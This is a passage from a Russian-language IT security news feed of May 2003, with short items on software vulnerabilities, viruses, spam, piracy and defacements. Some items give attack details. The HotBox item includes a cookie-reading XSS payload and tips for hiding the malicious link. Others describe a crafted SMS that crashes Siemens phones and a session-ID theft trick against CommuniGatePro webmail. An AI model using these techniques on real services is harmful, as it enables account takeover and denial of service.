натренировать его, пользователь может помечать спам вручную при помощи кнопки "Спам" в интерфейсе MSN Mail. Подробнее - http://www.microsoft.com/presspass/press/2003/may03/05-08SayonaraPR.asp
9/05/2003 22:38 Книга-руководство по взлому Xbox набирает популярность.
Автор книги, Andrew "Bunnie" Huang, сообщает что уже продал от 400 до 500 копий книги, не смотря на то, что официальные копии еще не поступили в продажу. Никто из издателей не берется за выпуск книги фрикера, из-за опасений нарушить DMCA и прочие законы. В книге несколько глав, которые подробно рассказывают все о домашней модификации приставки от Microsoft - о мод чипах и как они работают, советах для производителей по улучшению будущей защиты, о разных "лазейках" в приставке. Также книга подробно описывает нашумевшую в прошлом году технологию, которая позволяет перехватить зашифрованный ключ во время его передачи по высокоскоростноой шине внутри приставки. Подробности: http://www.securityfocus.com/news/4580
9/05/2003 21:32 Microsoft - штраф в 2 миллиарда?
В прошлом году американская Государственная Торговая Комиссия потребовала Microsoft улучшить систему безопасности своей системы Passport, если она конечно не хочет столкнуться с предьявленным штрафом на $2.2 миллиарда. Microsoft обещала работать над проблеммой, но 8го Мая официально признала, что в этой системе была найдена уязвимость в функции сброса пароля. Если госудерственная коммиссия США обнаружит, что Microsoft не приняла должных действий - ей прийдется раскошелится из-за невыполнения государственного приказа - по $11,000 за каждое нарушение(то есть на все 200 миллионов пользователей). Источник: http://www.theregister.co.uk/content/6/30620.html
9/05/2003 21:26 75 Самых популярных сетевых инструментов.
На днях, на сайте знаменитого сканера Nmap(www.insecure.org) был опубликован список самых популярных сетевых программ среди пользователей Nmap, в опросе приняло участие 1854 человека. Как и ожидалось, на первом месте знаменитый сканер безопасности Nessus, сниффер с открытым кодом Ethereal - на втором месте, ну а инструмент для мониторинга и обнаружения атак, Snort - оказался на третьем месте. Полный список можно посмотреть по ссылке ниже: http://www.nmap.org/tools.html
9/05/2003 01:18 Использование софтверного RAID в Linux.
Новая статья на linuxjournal.com, повествующая об использовании софтверного RAID в Linux. Ознакомиться - http://www.home.linuxjournal.com/article.php?sid=6412&mode=thread&order=0
8/05/2003 11:49 Уязвимость в Windows Media Player.
Господин Jouko Pynnonen из Online Solutions Ltd, Финляндия, сообщает об обнаружении уязвимости в Windows Media Player версий 7, 8, 9. Используя её удалённый злоумышленник, сформировав специальную HTML-страницу, может загрузить произвольный файл в произвольную директорию жертвы (с возможность дальнейшего выполнения). Связана уязвимость с особенностью Internet Explorer, который, при определении MIME-типа "application/x-ms-wmz" запускает Media Player (wmplayer.exe) c ключом "/layout", заставляя последний загрузить скин-файлы (.WMZ) из определённого URL в папку скинов Media Player. Примечательно, что при этом пользователь о загрузке скина не ставится в известность. Используя технрологию, подробности которой оговариваются автором, злоумышленник может загрузить произвольный файл в любую папку системы жертвы. Как и большинство других уязвимпостей, эта может также использоваться через Outlook (посредством e-mail) при установленной зоне безопасности "Internet zone". Microsoft выпущен бюллетень по безопасности с кодом MS03-017, описывающий шаги по предотвращению уязвимости. Бюллетень Microsoft - http://www.microsoft.com/technet/security/bulletin/MS03-017.asp
8/05/2003 11:17 Очень нужный HOW TO от Microsoft.
В вышедшем на днях бюллетене-молнии от Microsoft приведена ссылка на новый HOW TO, составленный специалистами Microsoft. Называется он "Переустановка и восстановление Internet Explorer & Outlook Express в Windows XP". Учитывая большое количество дыр, обнаруживаемых в крайнее время в продуктах Microsoft, смеем предположить, что этот HOW TO может стать настольной книгой счастливых пользователей XP. ;) Там же, кстати, можно найти HOW TO по резервному копированию, редактированию и восстановлению реестра в Windows XP (код - 322756), а также по формированию разделов и форматированию жёстких дисков в этой же ОС (код - 313348). Для доступа к документам необходимо изменить код после ";" приведённого ниже линка. HOW TO - http://support.microsoft.com/default.aspx?scid=kb;en-us;318378
8/05/2003 11:03 Очередной семинар Softline.
Как сообщает компания Softline, 13 мая состоится бесплатный семинар "Обеспечение безопасности информационных систем на платформе Microsoft". Семинар ориентирован на IT-менеджеров, системных архитекторов и администраторов безопасности информационных систем средних и крупных предприятий. Будет представлен общий подход к обеспечению безопасности при проектировании и эксплуатации ИС на платформе Microsoft, рекомендации по использованию продуктов и соответствующих источников информации, практические аспекты обеспечения безопасности сетей на основе Windows 2000. Большое внимание будет уделено вопросам создания инфраструктуры открытых ключей (PKI), использованию электронной цифровой подписи (ЭЦП) и средств криптографической защиты информации (СКЗИ) в защищенных прикладных системах. Традиционно семинар состоится по адресу: г.Москва, ул. Губкина, 8, Математический Институт им.Стеклова. Начало регистрации в 9.30. Регистрация - http://www.softline.ru/seminar.asp?...
8/05/2003 10:50 И ещё одна уязвимость в Internet Explorer.
Как пишет David F. Madrid из Испании, им обнаружена уязвимость в Internet Explorer, связанная с некорректной обработкой тегов. При кликании на специальным образом оформленном линке IE благополучно умирает. Связана уязвимость с особенностью обработки AnchorClick в DHTML объекта <a (линк). Вместо традиционного href можно определить папку (Folder) в качестве атрибута объекта. Если оставить это поле пустым, то при кликании на подобную ссылку IE упадёт с ошибкой доступа к нулевому указателю. Автором создана страница, демонстрирующая эту уязвимость. Демонстрация - http://usuarios.lycos.es/actualidad21/ie_URL_behaviour.html
8/05/2003 09:51 Интернет-компании отрицают "особые условия" сотрудничества с ФСБ.
В начале апреля газета "Ведомости" в формате слуха сообщила о том, что Федеральная Служба Безопасности требует от крупнейших российских интернет-компаний установить программное обеспечение, позволяющее более эффективно контролировать электронную переписку (так называемая система оперативно-розыскных мероприятий, или СОРМ). Причем в отличие от аппаратуры, установленной у интернет-провайдеров, СОРМ "почтовиков" позволит получать доступ к содержимому электронной переписки и определять физическое местонахождение компьютера, с которого пересылалось сообщение, с удаленного терминала и без помощи сотрудников компаний. Позже эта информация послужила поводом для материала, опубликованного на сайте Politcom.ru, где о переговорах ФСБ и почтовиков говорилось практически как о свершившемся факте. В частности, упоминались компании "Яндекс" и "Рамблер", которые, якобы, уже согласились с требованиями силовиков. К счастью, изложенные в тексте факты в действительности не нашли подтверждения. Так представители всех крупнейших бесплатных почтовых служб категорически отвергли факт какого-либо "специального" сотрудничества с органами госбезопасности. "Хочу заметить, что ни автор статьи Андрей Уранов, ни какой-либо другой представитель politcom.ru, ни "Ведомости" не обращались к "Яндексу" с просьбой "подтвердить или опровергнуть факт переговоров с ФСБ и установку дополнительного программного обеспечения", - рассказала нашему корреспонденту главный редактор "Яндекса" Елена Колмановская. - " У нас не стоит никакое дополнительное программное обеспечение от ФСБ". Подробности - http://www.runet.ru/analitika/2936.html Само сообщение - http://www.politcom.ru/2003/zloba2239.php
8/05/2003 09:17 Установлен очередной мировой рекорд кибератак.
На днях был побит мировой рекорд количества открытых (явных) цифровых атак, успешно осуществленных за 1 день. По данным лондонской компании компьютерной безопасности mi2g 4 мая 2003г. имели место быть 2 576 несанкционированных доступов к системе online. Предыдущий рекорд был зарегистрирован 3 января 2003г., когда на компьютеры и машины с цифровым управлением было совершенно 2 395 нападений."Ответственные лица ожидают монументального инцидента в сфере кибератак. Они не признают, что сумма всех явных вторжений растет с каждым днем и достигает размеры эпидемии", - говорит ДК Матай, глава компании mi2g. - "В начале 2003 мы уже зафиксировали почти такое же количество открытых атак за один день. Для сравнения в 2002 этот показатель был равен месячному уровню, а в 1999 эта цифра составила совокупность всех цифровых явных атак за целый год". Источник - http://www.mi2g.com
8/05/2003 09:12 Спамеры отметили профессиональный праздник.
Прошлый уикэнд был отмечен не только традиционными майскими праздниками. В мире информационных технологий случилась своя исторически знаменательная дата. Неприятное "торжество" всеобщего пользовательского раздражения - спаму исполнилось 25 лет. Исследователи Сети утверждают, что первое нежелательное сообщение было разослано в 1978 году. Тогда Интернет был более известен, как ARPANET и объединял многих представителей университетов и правительства в дискуссионные группы. Участники могли обмениваться электронными посланиями. Ровно 3 мая начальник отдела продаж компании по производству миникомпьютеров Digital Equipment Corporation решил отправить всем пользователям Арпанета на Восточном побережье сообщение о дне открытых дверей, где будут представлены новые машины от DEC. Электронное письмо вызвало бурю негодования и гнева. Мало того, что оно было примитивно написано, так еще и явно нарушало зародившиеся правила доступа к Сети: так, например, в Арпанете запрещалось распространять электронные письма коммерческого содержания. Нежелательные электронные рассылки стали называть "спамом" с легкой руки британских комиков из шоу "Монти Пайтон", - сообщает ВВС. В одной из шутливых постановок они изобразили ресторан, где клиентам предлагают к каждому блюду консервированный колбасный фарш("spam"). Исследователь Брэд Темплтон, утверждает, что первое употребление слова "спам" в сегодняшнем его значении произошло в марте 1993 года, когда администратор сети Usenet Ричард Депью нечаянно отправил 200 одинаковых сообщений в дискуссионную группу. Подробнее - http://www.runet.ru/news/2956.html
8/05/2003 09:03 "ВымпелКом" сертифицировал безопасность beeoffice.
"ВымпелКом" сообщил о присвоении системе электронного обслуживания абонентов beeoffice международного сертификата безопасности Trust Services. beeoffice представляет собой способ доступа к сервисам "Би Лайн" с мобильного телефона или через Интернет. С помощью данной технологии пользователь может запросить информацию о балансе или неоплаченных счетах, подключить или отключить ту или иную дополнительную услугу, а также оплачивать услуги связи. В прошлом году beeoffice стал первой в России электронной системой, получившей сертификат безопасности SysTrust. Trust Services представляет собой комплекс принципов и критериев, созданных Американским институтом сертифицированных профессиональных бухгалтеров (AICPA) и Канадским институтом сертифицированных бухгалтеров (CICA), для оценки надежности систем. Во многом Trust Services представляет собой сочетание предыдущих программ безопасности SysTrust и Webtrust. Источник - http://www.beeline.ru
7/05/2003 14:42 USG наносит удар по X-Force.
По сообщениям bugtraq.ru, USG осуществлён дефейс сайта компании, занимающейся вопросами информационной безопасности, который украсит послужной список любого хакера. Cобственно, вид дефейснутого сайта не представлял из себя образец художественных способностей - обычные пожелания "счастья" Бушу, Блэру, Шарону и всем, кто поддерживает войну и приветсвия единомышленникам. По сведениям zone-h.org на сервере стояла ОС Win2K. Зеркало дефейса - http://www.zone-h.org/en/defacements/view/id=258882
7/05/2003 14:11 Очередная уязвимость в сотовых телефонах Siemens.
Как сообщает наш соотечественник subj из команды dwcgr0up, обнаружена очередная дыра в ПО телефонов Siemens. Cвязана она с возможностью переполнения буфера при посылке специальным образом оформленного SMS-сообщения. При приёме оного труба выключается с каким-то непонятным звуком. На этот раз уязвимость связана с некорректной обработкой тега вставки графического изображения. В обычном режиме картинка ввводится при помощи конструкции "%IMG_NAME". Однако, если вместо этого тега вставить 157 различных символов (например "%....") и послать счастливому обладателю Siemens - труба выключится с описанными выше симптомами. После включения станет недоступен пункт меню Messages-> Inbox. В самом сообщении пишется, что существует несколько уточнений: если вы попытаетсь с телефона аналогичной фирмы послать такое же сообщение - он выключится, уязвимость обнаружена в трубках 45-й серии, однако, возможно - она существует и в остальных моделях. Похоже, что-то не в порядке у Siemens с софтом для сотовых. Остаётся ждать новой прошивки от производителя. Источник - http://www.dwcgr0up.com/subj/
7/05/2003 13:09 Немедленное реагирование как спасение от хакеров.
Беспрестанные атаки хакеров и появление все новых вирусов вынуждают компании быстрей, чем когда бы то ни было, реагировать на возникающие проблемы в области компьютерной безопасности — ведь промежуток времени между обнаружением очередной дыры и моментом, когда ей воспользуются злоумышленники, только сокращается. Часто находят применение инструменты защиты, работающие по принципу антивирусных сканеров. Они регулярно прочесывают всю сеть на предмет уязвимых мест. Именно через такие неприкрытые сегменты в систему могут проникнуть кибервандалы и причинить ощутимый ущерб, например, уничтожить или похитить какую-либо информацию. В прошлом году более 4000 лазеек было найдено в самых популярных пакетах программного обеспечения. Именно такими продуктами пользуются миллионы компаний, ведущих свой бизнес в интернете, сообщает BBC. Известно много случаев, когда хакеры, атакуя различные фирмы, используют давно известные всем дыры. Например, в январе 2003 года червь Slammer проник в сети через слабое место, которое было впервые обнаружено специалистами еще в мае 2002 года. Защитить себя не смогла даже корпорация Microsoft. Подробнее - http://www.webplanet.ru/news/internet/2003/5/6/hackers.html
7/05/2003 12:17 В сентябре правительство возьмётся за пиратов.
К сентябрю текущего года в правительстве России будут подготовлены предложения по защите авторов аудио- и видеопродукции от подделки и пиратства. Об этом сообщил журналистам глава Минпечати РФ Михаил Лесин после первого заседания правительственной комиссии по противодействию нарушениям в сфере интеллектуальной собственности. Заседание комиссии прошло во вторник под председательством премьер-министра Михаила Касьянова. По словам Лесина, в ходе заседания, в частности, обсуждалась возможность организации системы торговли аудио-визуальной продукцией, которая позволила бы минимизировать потери от контрафактной продукции и пиратства. Для защиты авторов необходимо будет доработать и изменить действующее законодательство. В рамках первоочередных мер, которые должно принять правительство для защиты интеллектуальной собственности, предполагается внести поправки в Гражданский кодекс. Они определят понятие интеллектуальной собственности, способы и методы ее использования. Исчтоник - http://www.rian.ru
7/05/2003 12:02 Новая жертва спама - мобильная связь.
В то время как ведущие компании и разработчики программного обеспечения ломают голову над тем, как освободить мировой трафик от спаммерского вторжения, операторы сотовых сетей бьют новую тревогу – скоро спам доберется и до мобильных телефонов. Проблема возросшего интереса спаммеров к сотовой связи, а именно к системе передачи коротких сообщений (СМС) стала ключевой на проходящем в четверг форуме по спаму. По словам участников Форума услуги текстовых сообщений являются слишком соблазнительными для спаммеров, открывая им новые возможности и потенциально новую аудиторию. Несмотря на то, что федеральные законы многих стран запрещают рекламным компаниям рассылать сообщения по мобильной связи ничто не мешает спаммерам воспользоваться другими способами передачи СМС. Мобильный спам уже представляет серьезную проблему для японских операторов сотовой связи, где передача СМС - сообщений является наиболее популярной услугой. Готовимся к спаму от Американского разговорного английского по сотовому, господа? ;) Источник - http://www.internet.ru
7/05/2003 11:38 Palm OS 6 будет готова к концу года.
На конференции для разработчиков Palm, которая проходит в эти дни, была приоткрыта некоторая информация о следующей версии Palm OS, самой распространённой операционной системы для карманных компьютеров. Вице-президент компании PalmSource (софтверного филиала Palm) Альберт Чу сообщил журналистам CNET, что новые версии операционной системы предполагается выпускать каждые год-полтора. Летом прошлого года была представлена Palm OS 5, первая операционная система Palm, работающая на процессорах ARM. Palm OS 6 будет готова к концу этого года. По мнению Чу, карманные компьютеры с Palm OS 6 появятся не раньше, чем через год. Он привёл в пример Palm OS 5: между выпуском операционной системы и появлением поддерживающих её устройств прошло несколько месяцев Подробнее - http://www.compulenta.ru/2003/5/7/39343/
7/05/2003 10:54 Новая версия Symbian OS.
Компания Symbian представила новую версию операционной системы Symbian OS - Symbian OS 7.0. Объявление было сделано на конференции Exposium03, которая проходила в конце апреля. Операционная система Symbian OS - это наиболее распространённая операционная система для мобильных телефонов. Она используется в мобильных телефонах, которые выпускают Nokia, Samsung, Sony Ericsson, Motorola и Siemens. По словам одного из руководителей Symbian Мортена Грауболла, новая версия операционной системы позволит разработчикам и операторам связи разрабатывать более сложные и удобные приложения, сервисы и контент. Среди новых возможностей Symbian OS 7.0 компания называет средства для работы с несколькими сетевыми сервисами одновременно, средства ограничения качества связи (QoS), позволяющие точнее распределять канал связи между различными приложениями, новая версия Jаva, новые средства для работы с мультимедийным контентом, а также поддержка арабского и еврейского языков. Подробности - http://www.symbian.com/press-office/2003/pr030429.html
7/05/2003 10:01 Популярность Visual Basic может пойти на убыль.
По данным недавнего исследования, популярность языка программирования Microsoft Visual Basic, которым пользуется половина всех профессиональных программистов, может пойти на убыль. Во вторник аналитическая фирма Evans Data сообщила, что 52% опрошенных разработчиков ПО используют Visual Basic, но 43% из них планируют перейти на другие языки, в том числе Java и C#. Visual Basic широко применяется в корпорациях, так как считается инструментом для быстрого создания Windows-приложений. Такие же языки, как C, Java и C#, требуют от программистов более высокой квалификации и обычно применяются для создания приложений с повышенными требованиями к производительности. Microsoft, благодаря огромному числу программистов на Visual Basic, удается удерживать разработчиков в кругу своих инструментов. Однако Evans Data, опросив 600 программистов в Северной Америке, пришла к выводу, что многие разработчики на Visual Basic рассматривают такие альтернативы, как Java: в них они видят больше возможностей для создания новых проектов. Microsoft тоже предлагает Java-инструмент, называемый Visual J#, но его можно использовать лишь для разработки приложений под Windows. «После Visual Basic 6.0 программисты выбирают языки, которые упрощают им работу с новыми технологиями, такими как беспроводные сети и веб-сервисы», — говорится в заявлении старшего аналитика Evans Data Эстер Шиндлер. Хорошая новость для Microsoft заключается в том, что часть программистов, отказавшись от Visual Basic, выбирает C#. Другой альтернативой служит Java — в последние годы популярность этого языка среди корпоративных программистов заметно растет. Подробности - http://zdnet.com.com/2100-1104_2-1000011.html
7/05/2003 09:41 Уязвимость в ICQ-клиенте.
Core Security Technologies, Бостон, США, сообщила об обнаружении целого букета уязвимостей в популярном ICQ-клиенте израильской фирмы Mirabilis - ICQ2003a (вплоть до ICQ Pro 2003a). Из 6-ти обнаруженных уязвимостей 3 связаны с встроенным POP3-клиентом: возможность перепонения формата строки в UIDL команде ответа сервера; переполнение буфера в поле "Subject", если его длина больше 16 бит (вариант решения - посылка e-mail жертве с соответствующим полем "Subject"); аналогичная ситуация с полем "Date". Еще одна связана с возможной подделкой адреса, с которого полуавтоматически закачиваются вспомогательные службы типа ICQ Phone, ICQ Web Search (носит название "ICQ Features on Demand") - таким образом, злоумышленник, подделав сигнатуры имееет возможность поставить своё "прогрммное обеспечение" ;). Пятая уязвимость связана с возможным DoS при закачке рекламных вставок, которые показывает клиент, из-за некорректной обработки тегов. Для осуществления атаки злоумышленнику необходимо имперсонифицировать ADS-сервер и послать затем специально сформированное HTML-сообщение, которое способно полностью завесить машину. Последняя, шестая, ошибка связана с некорректной обработкой заголовка GIF-файла. Собственная библиотека ICQ icqateimg32.dll уязвима к ошибке разбора входных данных, что может вызвать DoS - причём проблема присутствует при обработке заголовков GIF89a-файлов. Компания Mirabilis никак не прореагировала на 3 письма, посланные в марте и апреле, так что "счастливых" пользователей Аськи ждё много приятных неожиданностей. Подробности - http://www.coresecurity.com/common/showdoc.php?idx=315&idxseccion=10
6/05/2003 17:14 Очередная уязвимость в Internet Explorer.
Господа из malware.com откопали очередную уязвимость в Internet Explorer. Ранее, согласно ссобщению от 1 мая сообщалось об уязвимости в использовании компоненты Windows Web Folders. Функция Web Folders позволяет сохранить данные в известном расположении, что в сочетании с другими уязвимостями позволяет сохранить и выполнить код. В письме BUGTRAQ продемонстрирована возможность внедрить HTML-код локальную зону компьютера с обходом настроек безопасности броузера. При помощи этого HTML-кода был внедрён txt-файл, представляющий обой подписанный cab-файл Подробности - http://www.security.nnov.ru/search/document.asp?docid=4481 Демонстрация эксплоита - http://www.malware.com/aha.html
6/05/2003 16:48 Уязвимость в CommuniGatePro.
Yaroslav Polyakov сообщает об обнаружении уязвимости в довольно популярномй Web-ориентированной почтовой программе CommuniGatePro. Обнаружена в версиях 4.0.6 и раньше. Суть уязвимости заключается в том, что при работе с этой почтовой системой Session ID, используемый при работе CGP WebMail для поддержания сессии, передаётся в поле REFERER HTTP-запроса, когда броузер пользователя запрашивает графические изображение лиюо другие ресурсы, содержащиеся в HTML-сообщении. Используя эту особенность, злоумышленник может послать сообщение с полем IMG SRC, указывающим на рисунок на своём (или доступном) сервере и, таким образом, похитить Session ID. Это позволит в дальнейшем получить полный доступ к почтовому ящику пользователя. Рекомендуется обновить CommuniGatePro до версии 4.1b2. Автором выпущен эксплоит на Perl. Источник - http://www.securityfocus.com
6/05/2003 16:09 Уязвимость в GnuPG.
GnuPG Team сообщает, что в процессе работы над новой версией популярного в мире открытых систем паета PGP-шифрования под названием GnuPG была обнаружена уязвимость. Cуть её заключается в том, что при определенных условиях сообщение может быть зашифровано ключем другого пользователя без предупреждения. Такими определёнными условиями является наличие ключа с двумя ID пользователей. Уязвимость (довольно призрачная и скорее теоретическая, надо сказать - судя по её описанию) обнаружена в GnuPG версий до 1.2.2. Для устранения рекомендуется либо обновитьсмя до этой новой версии, либо применить патч, выпущенный командой. Описание - http://www.security.nnov.ru/search/document.asp?docid=4483
6/05/2003 15:06 Вышел OpenOffice 1.0.3.1.
Вышел новый-старый OpenOffice с умопомрачительной версией 1.0.3.1. Необходимость в выпуске возникла в связи с тем, что в версии 1.0.3 были обнаружены проблемы с печатью - сообщается на linux.org.ru. Подробности - http://www.openoffice.org/dev_docs/source/1.0.3/
6/05/2003 14:12 Еженедельный Информационный Бюллетень Gentoo теперь на русском.
GWN (Gentoo Weekly Newsletter) - еженедельный обзор Gentoo-сообщества. Довольно интересный обзор, который будет наверняка небезынтересен русскоязычным пользователям этого дистрибутива Linux. Подробности - http://www.gentoo.org/news/ru/gwn/gwn.xml
5/05/2003 15:24 Недельный отчет о вирусах Panda Software.
Сегодня опубликован очередной еженедельный отчёт Panda Software о вирусной активности прошедшей недели. В нём рассмотрены - макровирус Aurity, два червя - Halfint и Nolor, а также троянец Optix.Pro. Aurity (W97M/Aurity) – это макровирус, принадлежащий к семейству W97M и заражающий документы Microsoft Word 97, а также используемые ими шаблоны. Сначала вирус заражает открытый документ и шаблон NORMAL.DOT, и, поскольку теперь сам шаблон является зараженным, все использующие его документы также будут заражены. Aurity выполняет следующие действия: отключает антивирусную защиту макросов Word. Это означает, что при открытии документа Word не запрашивает подтверждение включения макросов, содержащихся в таком документе. Заражает документы Word (файлы с расширением DOC). Заражает общий шаблон Word, что влечет за собой заражение всех документов, использующих его. Halfint (W32/Halfint) – это червь, не наносящий каких-либо деструктивных действий и распространяющийся посредством программы для обмена файлами KaZaA. При активации червь создает 36 своих копий в общей папке KaZaA. Все имена зараженных файлов связаны с компьютерными программами и играми, например, Age of Empires 2 - Crack.exe, Playstation 2 Emulator Downloader.exe или Windows Key Generator (all versions).exe. Это помогает червю обманывать пользователей и проникать на компьютеры своих очередных жертв. Nolor (W32/Nolor) – это червь, распространяющийся по электронной почте. После заражения компьютера он рассылает свои копии с помощью собственного SMTP механизма по всем адресам, хранящимся в адресной книге компьютера. Сообщение, содержащее Nolor, очень сильно меняется, но всегда оно связано с фотографиями Бин Ладена, поздравительными открытками или паролями для каких-либо программ. Тем не менее, Nolor достаточно легко опознать, так как сообщение всегда содержит один из следующих вложенных файлов: LOVE_LORN.KIS.OK.EXE, LOVELORN.KIS.OK.EXE, THUYQUYEN.KIS.OK.EXE, LOVE_LORN.HTM, LOVELORN.HTM или THUYQUYEN.HTM. Подробнее - http://www.viruslab.ru/press/index.php?go=show&num=141
5/05/2003 13:21 Власти США: Украина - самая пиратская страна.
Американское правительство обнародовало очередной рейтинг стран с наиболее высоким уровнем аудио-, видео- и компьютерного пиратства. При этом оценивалась не только доля пиратской продукции на национальных рынках, но и ущерб, наносимый пиратами из этих стран, а также состояние борьбы с пиратством (наличие соответствующего законодательства и контроль над его соблюдением). Всего в список вошло 50 стран, общий ущерб от деятельности пиратов в которых составил 9,8 млрд. долл. США. Возглавила рейтинг пиратства Украина, разгул пиратства в которой заставил США в январе прошлого года ввести особые экономические санкции. Эти санкции сохранят свою силу и в нынешнем году, так как украинское правительство не сумело разработать эффективные меры по пресечению деятельности пиратов. В результате, Украина попала в список Priority Foreign Country, куда заносятся самые злостные нарушители международных правил торговли. Высокий уровень пиратства и бездействие властей имеют место и в других странах, таких как Россия, Бразилия, Польша, Тайвань и другие. Однако эти страны попали в менее жесткий список Priority Watch List, в котором присутствуют также Европейский Союз (он рассматривается американскими властями как единое целое), Аргентина, Индия, Индонезия, Ливан, Филиппины и Багамские острова. Особое внимание власти США уделяют также Китаю и Парагваю. Эти страны заключили с США соглашения по долгосрочной борьбе с пиранством, но смогли выполнить их условий. Подробнее - http://www.compulenta.ru/2003/5/5/39323/?ref=sidebar
5/05/2003 12:17 Новгород в чёрном списке Spews.
По сообщению информационного агентства Regnum, крупный новгородский интернет-провайдер NovLine был занесён чёрные списки популярной противоспамной системы Spews. Как объяснили корреспонденту ИА Regnum в отделе технической поддержки NovLine, все сети компании по ошибке попали в список спамеров на сайте www.spews.org. В настоящее время любой почтовый сервер, проверяющий почту при помощи Spews, отказывается принимать почту с IP-адресов компании NovLine. Списки Spews широко используются во всём мире, так что клиенты NovLine оказались в незавидном положении. Сейчас компания ведет работу по исключению своих сетей из списков Spews. Подробности - http://www.regnum.ru/allnews/112426.html
5/05/2003 11:59 Уязвимость Cross-site scripting на HotBox.Ru.
Найденный XSS содержится в механизме просмотра писем через веб-интерфейс почтового портала. Engine сервера удачно фильтрует теги типа <sсript>, однако не проверяет тег <A> на внедрение спецсимволов типа " или ' . В итоге, можно послать на любой почтовый ящик HotBox письмо, содержащее в теле специальным образом сформированную ссылку через тег <A>, и при открытии такого письма через веб-интерфейс Хотбокса исполнится javаsсript, внедрённый через эту ссылку. Дальнейшее - дело техники и фантазии атакующего. Например, неплохо работает вариант с вставкой внутрь тега <A> кода типа OnMouseOver='javаsсript:alert(document.cookie);', для усугубления можно, во-первых, замаскировать ссылку с помощью задания ей такого же цвета, как и у фона, а также с помощью стилей распространить ее действие на все окно. Администрация извещена, обещано исправление в ближайшее время. Уязвимость обнаружена ERRor, dHtm. Источник - http://www.bugtraq.ru
5/05/2003 10:57 План релиза FreeBSD 5.1.
Появился план следующего релиза ОС FreeBSD - 5.1. Основная часть разработки должна пройти с пятого мая (тогда выйдет бета-версия для процессорных архитектур x86, alpha, sparc64, ia64 - 5.1-BETA) до второго июня, когда и состоится официальный релиз FreeBSD 5.1. Первый кандидат в релизы (Release Candidate - RC) должен быть выпущен уже 19 мая, второй - 27 мая. Информация получена из списка рассылки *nixp. Подробности - http://www.freebsd.org/releases/5.1R/schedule.html
5/05/2003 10:54 Майский номер Linux Gazette.
Вышел очередной, майский номер электронной газеты Linux Gazette, #90. В нем можно найти такие статьи как "Разработка программного обеспечения для Sharp Zaurus SL-5500 Linux PDA" ("Software development for a Sharp Zaurus SL-5500 Linux PDA"), "Система печати CUPS" ("The CUPS printing system"), "Программирование в User Mode Linux" ("Programming with User Mode Linux"). Подробнее - http://www.linuxgazette.com/issue90/index.html
5/05/2003 09:11 Cтатья о целочисленном переполнении.
Майкл Ховард из Microsoft сообщил широкой публики об опубликовании на сайте Microsoft статьи, в которой описывается технология и последствия целочисленного переполнения (integer overflow) в программном коде, а также о том, как избежать этой ситуации при написании программ. Статья - http://msdn.microsoft.com/columns/secure.asp
4/05/2003 16:00 Новая попытка повысить безопасность в Linux.
Для Linux/x86 вышел первый общественно доступный релиз исходного кода нового, основанного на ядре, средства повышения безопасности ОС - "Exec Shield". Патч для ядра вышел под лицензией GPL/OSL. "Exec shield" предоставляет защиту против переполнений stack'а, буфера, а также против других видов эксплоитов, выполняющих перезапись данных в структурах и/или изменяющих код таких структур. Также патч усложняет возможность вызова так называемых "shell-code" эксплоитов. "Exec shield" работает таким образом, что перекомпилировать какое-либо приложение для него не надо. Информация о патче получена всё с того же списка рассылки проекта *nixp. Подробнее о патче - http://newsforge.com/newsforge/03/05/02/1914223.shtml?tid=23
4/05/2003 15:24 Уязвимость в rpcbind в ОС Solaris.
Как сообщается в бюллетене по безопасности 50922, выпущенном Sun Microsystems, в rpcbind существует уязвимость, которая позволяет удалённому злоумышленнику, выполнив атаку на переполнение буфера, аварийно завершить сервис rpcbind, осуществляющий привязку служб RPC (Remote Protocol Control) к определённым портам. Уязвимость обнаружена в версиях Solaris 2.6, 7, 8, 9 для обоих поддерживаемых платформ - x86 и SPARC. Выпущены патчи для всех версий, которые доступны на сайте. Подробности - http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F50922
4/05/2003 14:21 Многие приложения для NT не будут работать на Server 2003.
На Windows Server 2003, по всей вероятности, будет функционировать менее трех четвертей приложений для Windows NT 4, что служит ощутимым препятствием для апгрейда в тех компаниях, где все еще работают на NT 4 — а Microsoft хочет привлечь к новой операционной системе именно их. На презентации Windows Server 2003 в Лондоне Роберт Шорт, отвечающий в Microsoft за код ядра Windows, признал, что при расширенном тестировании свыше четверти NT-приложений не работали на Windows Server 2003. «Мы поставили перед собой очень высокую цель, но на пути к достижению этой цели столкнулись с проблемами безопасности, — сказал он… — Будут работать где-то около 70% приложений. Но не 90%». Microsoft надеется, что Windows Server 2003 станет версией операционной системы, которая, наконец, убедит компании, все еще использующие Windows NT 4, в целесообразности апгрейда. Поддержка Windows NT 4 должна была быть прекращена в начале этого года, но давление со стороны заказчиков вынудило Microsoft перенести этот срок на январь 2005 года. «Мы хотим перевести клиентскую базу NT 4 на Windows Server 2003. Заказчики говорят, что это именно то, чего они дожидались, — говорил в недавнем интервью ZDNet UK менеджер по маркетингу серверных продуктов Microsoft Windows Марк Теннант. — Многие заказчики еще ждут выхода Exchange 2003». Microsoft Exchange Server 2003 должен поступить в продажу этим летом. Microsoft не говорит, какие именно приложения не работают; по всей вероятности, будет организован процесс сертификации. Чтобы обеспечить защиту новой версии Windows, Microsoft обучила своих программистов хакерским трюкам и даже нанимала настоящих хакеров. «Мы выбрали восемь-десять лучших программистов и поручили им стать хакерами… И они стали взламывать систему», — сказал Шорт. По его словам, новый код в десять-сто раз качественнее прежнего. Подробности - http://zdnet.com.com/2100-1104-998826.html
4/05/2003 13:18 Сайт SCO был атакован Linux-фанатами.
Как сообщает SHuRuP с nixp.ru, На протяжении нескольких часов в пятницу доступ к Web-сайту SCO Group был невозможен по причине атак со стороны Linux-фанатов, протестующих таким образом против иска SCO по отношению к IBM. Сайт поставщика Unix и Linux ПО был не доступен из-за DoS-атак ("denial-of-service" - "отказ от обслуживания"), приостановивших интернет операции компании. Во время DDoS-атаки компьютерам посылается такое количество данных по сети, что приводит к общей загруженности системы, и тормозит все попытки передачи трафика. Blake Stowell, репортер SCO, сообщил, что у его компании нет никаких предположений, кто стоит за этой атакой, но в последнее время у нее (SCO Group) появилось немалое количество врагов в лице любителей Linux'а, поддерживающих IBM. Поробности - http://news.com.com/2100-1002_3-999584.html?tag=lh
4/05/2003 13:13 Обновлен пакет совместимости RedHat'а в OpenBSD.
